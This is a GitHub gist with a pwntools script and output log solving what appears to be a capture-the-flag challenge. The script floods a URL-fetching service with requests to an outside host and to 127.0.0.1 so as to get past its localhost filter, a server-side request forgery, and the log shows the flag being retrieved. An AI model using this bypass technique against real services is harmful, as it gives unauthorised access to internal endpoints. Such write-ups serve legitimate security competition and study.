Created
September 22, 2019 13:57
-
-
Save l4wio/19d27086b57c69871c9178b055c13add to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote("rms-fixed.hackable.software",1337) | |
def add_url(url): | |
r.recvuntil('Choice') | |
r.sendline("a") | |
r.recvuntil("url?") | |
r.sendline(url) | |
def view_request(idx): | |
r.recvuntil('Choice') | |
r.sendline("v") | |
r.recvuntil("request id?") | |
r.sendline(str(idx)) | |
data = r.recvuntil("What do?") | |
return data | |
raw_input("?") | |
target = "http://google.com:8000/flag" | |
for i in range(5): | |
add_url(target) | |
for i in range(2): | |
add_url("http://127.0.0.1:8000/flag") | |
r.interactive() | |
""" | |
Choice? [pfvaq] $ f Done: [5] FAIL: localhost not allowed | |
[6] FAIL: localhost not allowed | |
[0] OK, HTTP/1.0 200 OK | |
[1] OK, HTTP/1.0 200 OK | |
[2] OK, HTTP/1.0 200 OK | |
[3] OK, HTTP/1.0 200 OK | |
[4] OK, HTTP/1.0 200 OK | |
What do? | |
list [p]ending requests | |
list [f]inished requests | |
[v]iew result of request | |
[a]dd new request | |
[q]uit | |
Choice? [pfvaq] $ v request id? $ 0 [0] Response, 121 bytes: HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.15+ | |
Date: Sun, 22 Sep 2019 13:57:04 GMT | |
DrgnS{e9759caf4f2d2b69773c} | |
What do? | |
list [p]ending requests | |
list [f]inished requests | |
[v]iew result of request | |
[a]dd new request | |
[q]uit | |
Choice? [pfvaq] $ | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment